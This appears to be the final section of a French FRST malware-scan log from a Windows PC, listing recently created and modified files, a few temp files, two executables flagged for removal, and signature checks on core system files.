2018-07-19 14:36 - 2018-04-26 14:43 - 000065880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000021848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000018776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000998912 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000063832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000020824 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000019288 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000016216 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000015704 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000014168 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000013656 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012632 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-25 18:38 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2018-07-18 15:02 - 2018-07-18 15:02 - 005208782 _____ C:\Users\pc1\Downloads\guide-2018-bat-final.pdf
2018-07-18 14:46 - 2018-07-18 14:46 - 000280947 _____ C:\Users\pc1\Downloads\Liste des membres du Conseil-2016-2021_27_13.07.18.pdf
2018-07-18 14:30 - 2018-07-18 14:30 - 003836419 _____ C:\Users\pc1\Downloads\VEIGY+-+ECHO_188.pdf
2018-07-17 20:42 - 2018-07-17 20:42 - 008168015 _____ C:\Users\pc1\Downloads\guideville+2017.pdf
2018-07-17 20:40 - 2018-03-27 00:24 - 000029352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:24 - 000019088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr100_clr0400.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000030888 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000019088 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2018-07-16 12:08 - 2018-07-16 12:10 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (2).pdf
2018-07-16 12:03 - 2018-07-16 12:03 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (2).pdf
2018-07-15 20:34 - 2018-06-12 20:01 - 000149632 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 002860032 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 001602048 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000783872 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000612352 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000470016 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000443392 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000301056 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000246272 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2018-07-13 19:31 - 2018-07-13 19:31 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3 (1).swf
2018-07-13 19:23 - 2018-07-13 19:23 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3.swf
2018-07-13 19:18 - 2018-07-13 19:18 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (1).pdf
2018-07-13 19:17 - 2018-07-13 19:17 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst.pdf
2018-07-12 11:56 - 2018-07-12 11:56 - 008239366 _____ C:\Users\pc1\Downloads\05 Renoult PA. Nouvelles utilisations du systeme information médical des forces. Médecine et Armées 2017-2-129-36.pdf
2018-07-10 09:27 - 2018-07-10 09:27 - 000000165 ____H C:\Users\pc1\Documents\~$Rapport Maggi 2016.pptx
2018-07-09 22:16 - 2018-07-09 22:16 - 000319809 _____ C:\Users\pc1\Downloads\CURRICULUM VITAE DIANE ASTRIDE K. -ASSISTANTE BUSINESS DEVELOPER.pdf
2018-07-09 22:16 - 2018-07-09 22:16 - 000109149 _____ C:\Users\pc1\Downloads\Lettre de motivation Diane K. Business Developer.pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000285120 _____ C:\Users\pc1\Downloads\facture orange (1).pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000280488 _____ C:\Users\pc1\Downloads\permi raf.pdf
2018-07-09 18:04 - 2018-07-09 18:05 - 000259990 _____ C:\Users\pc1\Downloads\ci raf.pdf
2018-07-07 23:33 - 2018-07-07 23:33 - 000738961 _____ C:\Users\pc1\Downloads\20171017210857.pdf
2018-07-03 12:42 - 2018-07-03 12:44 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (1).pdf
2018-07-03 00:07 - 2018-07-03 00:07 - 000438996 _____ C:\Users\pc1\Downloads\organisme-habilite-aps-asd.pdf
2018-07-02 23:43 - 2018-07-02 23:43 - 003016173 _____ C:\Users\pc1\Downloads\BO n° 281 (avril 2018).pdf

==================== Un mois - Modifiés - fichiers et dossiers ========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2018-07-26 23:16 - 2017-02-02 20:53 - 000000000 ____D C:\Program Files\Opera
2018-07-26 23:12 - 2017-05-22 19:30 - 000000000 ____D C:\Users\pc1\Documents\Youcam
2018-07-26 23:12 - 2017-02-20 15:38 - 000000000 _____ C:\Users\Public\Documents\temp.dat
2018-07-26 23:09 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-07-26 23:04 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1
2018-07-26 22:59 - 2015-08-27 19:22 - 000000000 ____D C:\Users\pc1\AppData\Local\ClassicShell
2018-07-26 22:54 - 2017-05-04 11:18 - 000000000 ____D C:\Users\pc1\AppData\Local\background_fault
2018-07-26 21:26 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\system32\NDF
2018-07-26 19:19 - 2017-03-26 22:26 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-813913080-1538114768-4122880109-1001
2018-07-26 18:01 - 2015-05-27 17:43 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Adobe
2018-07-26 16:19 - 2016-01-24 23:39 - 000000000 ____D C:\Windows\system32\MRT
2018-07-26 15:59 - 2016-01-24 23:39 - 134675576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2018-07-26 15:31 - 2018-01-03 22:13 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2018-07-26 15:31 - 2015-09-10 12:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-07-26 08:04 - 2015-11-10 18:13 - 000000000 ____D C:\Users\pc1\AppData\Roaming\vlc
2018-07-25 20:10 - 2016-01-21 11:05 - 000000000 ____D C:\Users\pc1\AppData\Roaming\VIP72 Socks Client
2018-07-25 20:09 - 2016-01-17 17:42 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-07-23 19:17 - 2018-03-28 23:45 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Matisoft
2018-07-23 16:42 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1\AppData\Local\Packages
2018-07-22 19:24 - 2017-06-02 20:29 - 000000000 ____D C:\Windows\CbsTemp
2018-07-20 20:57 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2018-07-19 23:21 - 2013-08-22 15:44 - 005374488 _____ C:\Windows\system32\FNTCACHE.DAT
2018-07-19 23:12 - 2013-08-22 16:36 - 000000000 ___RD C:\Windows\ToastData
2018-07-19 13:55 - 2018-05-09 19:53 - 000685568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2018-07-18 20:15 - 2018-05-25 03:57 - 005130519 _____ C:\Users\pc1\Downloads\video.mp4
2018-07-18 12:23 - 2016-01-25 01:54 - 000000000 ____D C:\Windows\system32\appraiser
2018-07-16 23:02 - 2015-09-10 12:20 - 000563832 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2018-07-11 22:46 - 2018-05-26 08:38 - 000000000 ____D C:\Users\pc1\Documents\Fichiers Outlook
2018-07-10 09:15 - 2016-07-07 09:33 - 000000000 ____D C:\Users\pc1\Documents\fan DANGO-FANXTRA
2018-07-06 11:51 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\tracing
2018-07-02 18:11 - 2017-05-03 22:36 - 000000000 ____D C:\Users\pc1\AppData\Roaming\WhatsApp
2018-07-01 12:25 - 2017-04-20 18:09 - 000000000 ____D C:\Users\pc1\Downloads\son
2018-06-28 23:07 - 2018-03-21 09:45 - 000835064 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-06-28 23:07 - 2018-03-21 09:45 - 000179704 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

==================== Fichiers à la racine de certains dossiers =======

2017-02-20 21:10 - 2017-05-02 09:35 - 000057444 _____ () C:\Program Files (x86)\metadata
2017-02-20 21:10 - 2017-05-02 09:06 - 000000040 _____ () C:\Program Files (x86)\settings.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 000000000 _____ () C:\Users\pc1\AppData\Roaming\agent.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 001132960 _____ () C:\Users\pc1\AppData\Roaming\Damsantex.tst
2017-05-31 13:46 - 2017-05-31 13:46 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\eMail Verifier.ini
2017-05-19 11:32 - 2017-06-02 13:36 - 000003475 _____ () C:\Users\pc1\AppData\Roaming\go00001.bak
2017-02-26 11:12 - 2017-02-26 11:13 - 000015696 _____ () C:\Users\pc1\AppData\Roaming\InstallationConfiguration.xml
2017-02-26 11:12 - 2017-02-26 11:12 - 000140288 _____ () C:\Users\pc1\AppData\Roaming\Installer.dat
2017-06-02 15:43 - 2017-06-02 15:43 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\MaxBulk registration.ini
2016-04-03 17:57 - 2017-05-08 15:21 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Filtre IllExportation Adobe CS6
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2016-06-29 08:33 - 2018-01-25 15:08 - 000005632 _____ () C:\Users\pc1\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-12 11:36 - 2015-10-12 11:36 - 000000000 _____ () C:\Users\pc1\AppData\Local\{B1C33B2F-8FDC-408C-8438-0EEEDBBF18F3}

Fichiers à déplacer ou supprimer:
====================
C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe
C:\Users\pc1\AppData\Local\background_fault\aswRD.exe


Certains fichiers dans TEMP:
====================
2017-11-28 18:37 - 2017-11-28 18:37 - 000009728 _____ () C:\Users\pc1\AppData\Local\Temp\bassmod.dll
2017-07-13 20:50 - 2017-07-13 21:01 - 058740704 _____ (Skype Technologies S.A.) C:\Users\pc1\AppData\Local\Temp\SkypeSetup.exe
2017-09-15 17:21 - 2017-09-15 17:30 - 030950664 _____ () C:\Users\pc1\AppData\Local\Temp\vlc-2.2.6-win32.exe

==================== Bamital & volsnap ======================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement
C:\Windows\system32\wininit.exe => Le fichier est signé numériquement
C:\Windows\explorer.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\explorer.exe => Le fichier est signé numériquement
C:\Windows\system32\svchost.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\svchost.exe => Le fichier est signé numériquement
C:\Windows\system32\services.exe => Le fichier est signé numériquement
C:\Windows\system32\User32.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\User32.dll => Le fichier est signé numériquement
C:\Windows\system32\userinit.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\userinit.exe => Le fichier est signé numériquement
C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement
C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement

LastRegBack: 2018-07-26 15:55

==================== Fin de FRST.txt ============================
